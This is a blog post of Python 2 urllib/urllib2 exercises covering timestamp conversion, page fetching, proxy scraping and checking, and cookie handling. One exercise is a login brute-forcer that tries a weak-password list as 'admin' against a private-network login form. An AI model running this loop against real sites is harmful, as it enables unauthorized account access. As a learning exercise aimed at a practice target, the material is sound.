Python examples: a collection of urllib/urllib2 exercises


#!/usr/bin/python
#coding:utf-8
import time
import urllib
import urllib2
from bs4 import BeautifulSoup
import re
import cookielib

def main0():
    unix_timenow = int(time.time())
    print 'Current unix timestamp: %d' % unix_timenow

    timenow = time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(unix_timenow))
    print 'Current formatted time: %s' % timenow

    time.sleep(3)
    unixtime = time.mktime(time.strptime(timenow, '%Y-%m-%d %H:%M:%S'))
    print 'Unix timestamp: %s' % unixtime

# 1. Convert '2015-1-16 12:00:00' to a unix timestamp, then compute the
#    formatted time and unix timestamp of 3 days earlier.
def main1():
    time1 = '2015-1-16 12:00:00'
    unixtime1 = time.mktime(time.strptime(time1, '%Y-%m-%d %H:%M:%S'))
    print '1: unix timestamp: %s' % unixtime1

    unixtime2 = unixtime1 - 60*60*24*3
    print '1: timestamp 3 days ago: %s' % unixtime2
    time2 = time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(unixtime2))
    print '1: formatted time 3 days ago: %s' % time2
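
# A minimal alternative sketch of the same conversion using the standard
# datetime module (not part of the original exercise): timedelta handles
# the 3-day offset without manual second arithmetic.
def main1_datetime():
    import datetime
    t1 = datetime.datetime.strptime('2015-1-16 12:00:00', '%Y-%m-%d %H:%M:%S')
    t2 = t1 - datetime.timedelta(days=3)                      # subtract 3 days
    print '1: formatted time 3 days ago: %s' % t2.strftime('%Y-%m-%d %H:%M:%S')
    print '1: timestamp 3 days ago: %s' % time.mktime(t2.timetuple())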

# 2. Use urllib to fetch the Baidu home page and extract its title, status
#    code, content length and cookie values.
def main2():
    url = 'http://www.baidu.com'
    response = urllib.urlopen(url)
    headers = response.info()
    cookie = headers['Set-Cookie']        # if there are several cookies, this reads them all at once
    html = response.read()                # the raw HTML source as a str
    soup = BeautifulSoup(html, 'html.parser')
    title = soup.title.string
    statuscode = response.getcode()
    htmlLength = len(html)
    print 'title:%s\nstatus:%s\ncontentlength:%s\ncookie:%s' % (title, statuscode, htmlLength, cookie)
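
# The same request made through urllib2, as a sketch (not part of the
# original exercise): the response object exposes the same
# info()/getcode() interface as urllib's.
def main2_urllib2():
    response = urllib2.urlopen('http://www.baidu.com', timeout=5)
    print 'status:%s' % response.getcode()
    print 'cookie:%s' % response.info().getheader('Set-Cookie')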

# 3. Use urllib to fetch http://www.cz88.net/proxy/index.shtml and extract
#    the proxy server IP addresses.
def main3():
    url = 'http://www.cz88.net/proxy/index.shtml'
    response = urllib.urlopen(url)
    html = response.read()
    soup_html = BeautifulSoup(html, 'html.parser')
    ip_div = soup_html.find_all('div', class_='box694')
    pattern = re.compile(r'<li><div class="ip">(.*?)</div><div class="port">(.*?)</div><div class="type">(.*?)</div><div class="addr".*?>(.*?)</div></li>')
    fwip = open('proxy_ip.txt', 'w')
    for i in ip_div[0].ul:
        #print 'i:%s' % i
        items = re.findall(pattern, str(i))
        if items != []:
            #print 'items:%s' % items
            li = list(items[0])
            if li[0] != 'IP':                  # skip the table header row
                fwip.write(','.join(li) + '\n')
    fwip.close()
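
# An alternative sketch that walks the parsed tree instead of regex-matching
# raw HTML (assumes the same <li>/<div class="ip"|"port"> layout as above):
def main3_soup():
    html = urllib.urlopen('http://www.cz88.net/proxy/index.shtml').read()
    box = BeautifulSoup(html, 'html.parser').find('div', class_='box694')
    if box is None:
        return                                  # page layout changed; nothing to extract
    with open('proxy_ip.txt', 'w') as fwip:
        for li in box.find_all('li'):
            ip = li.find('div', class_='ip')
            port = li.find('div', class_='port')
            if ip and port and ip.get_text() != 'IP':   # skip the header row
                fwip.write('%s,%s\n' % (ip.get_text(), port.get_text()))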

# 4. urllib2 exercise:
#    brute-force the username and password of http://127.0.0.1/www/Login/index.html
#    using the weak-password file weak_passwd.txt.
def main4():
    fo = open('weak_passwd.txt', 'r')
    pass_list = fo.readlines()
    fo.close()                        # close before the loop, not after an early return
    for i in pass_list:
        i = i.strip()
        isok = post('admin', i)
        if isok:
            print 'password:%s' % i
            return

def post(name, pwd):
    data = urllib.urlencode({"username": name, "password": pwd})
    content_length = len(data)
    headers = {
        "Host": "192.168.2.150",
        "Pragma": "no-cache",
        "Content-Length": content_length,
        "Accept": "text/html, application/xhtml+xml, */*",
        "User-Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; NMJB; rv:11.0) like Gecko",
        "Content-Type": "application/x-www-form-urlencoded",
        "Referer": "http://192.168.1.139/www/Login/index.html",
        "Cookie": "thinkphp_show_page_trace=0|0; PHPSESSID=dbg5jjc9t76njqp6bimk43hjr4",
        }
    # Client = httplib.HTTPConnection("192.168.1.139", 80, timeout=5)
    # Client.request("POST", "/www/Login/login/", data, headers)
    # response = Client.getresponse()

    url = 'http://192.168.1.139/www/Login/login/'
    request = urllib2.Request(url, data, headers)
    response = urllib2.urlopen(request)
    # how to detect a successful login differs per site; here a redirect away
    # from the login page counts as success
    if response.geturl() == 'http://192.168.1.139/www/Show/index.html':
        return True
    else:
        return False
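
# A sketch of an alternative success check that inspects the response body
# instead of the final URL. The marker string is a hypothetical placeholder;
# pick text that only appears on the logged-in page of the target site.
def login_succeeded(response):
    body = response.read()
    return 'Login' not in body        # hypothetical marker: login form no longer present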

# 5. urllib2 proxy exercise:
#    take the proxies saved to file in exercise 3 and use urllib2's proxy
#    handler to verify which of them are usable.
def main6():
    proxy = 'proxy_ip.txt'
    proxy_list = open(proxy, 'r').readlines()
    available_ip = []
    for i in proxy_list:
        i = i.strip().split(',')      # strip the newline before splitting, so the port is clean
        isok = testProxy(i[0], i[1])
        if isok:
            available_ip.append((i[0], i[1]))
    for j in available_ip:
        print 'available IP is %s:%s' % (j[0], j[1])

def testProxy(ip, port):
    #proxyip = 'http://%s:%s@%s' % (user, passwd, proxyserver)    # form for an authenticated proxy
    proxyip = 'http://%s:%s' % (ip, port)
    proxy_handler = urllib2.ProxyHandler({'http': proxyip})    # route http requests through the proxy
    opener = urllib2.build_opener(proxy_handler)
    request = urllib2.Request('http://www.baidu.com')
    try:
        response = opener.open(request, timeout=5)
        return response.getcode() == 200
    except Exception:
        return False              # unreachable or timed-out proxies count as unavailable
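
# A sketch showing urllib2.install_opener, which makes the proxy opener the
# process-wide default so plain urllib2.urlopen calls also go through it
# (not used by the exercise above):
def use_proxy_globally(ip, port):
    handler = urllib2.ProxyHandler({'http': 'http://%s:%s' % (ip, port)})
    urllib2.install_opener(urllib2.build_opener(handler))
    return urllib2.urlopen('http://www.baidu.com', timeout=5).getcode()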
    
# 6. Using the cookielib module.
def main7():
    #cookiefile = 'cookie.txt'                          # local file to store cookies in
    #cookie = cookielib.MozillaCookieJar(cookiefile)    # create a cookie jar backed by a local file
    #cookie = cookielib.MozillaCookieJar()              # to load cookies from a local file, create the jar like this
    #cookie.load(cookiefile)                            # then load the cookies from that file
    cookie = cookielib.CookieJar()    # default in-memory cookie jar
    cookie_handler = urllib2.HTTPCookieProcessor(cookie)    # attach the cookie jar to HTTP handling
    opener = urllib2.build_opener(cookie_handler)           # build an opener that uses the cookie handler
    url = "http://www.qq.com"
    request = urllib2.Request(url)
    response = opener.open(request, timeout=5)
    print response.getcode()
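
# A sketch that persists cookies to disk with MozillaCookieJar, following the
# commented lines above ('cookie.txt' is an arbitrary local filename):
def main7_save():
    cookie = cookielib.MozillaCookieJar('cookie.txt')
    opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cookie))
    opener.open('http://www.qq.com', timeout=5)
    cookie.save(ignore_discard=True, ignore_expires=True)   # also write session cookies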

if __name__ == '__main__':
    # main0()
    # main1()
    # main2()
    main3()
    # main4()
    main6()    # there is no main5; main6 is the exercise-5 proxy check
    # main7()

 


Original post: http://www.cnblogs.com/xccnblogs/p/4888186.html
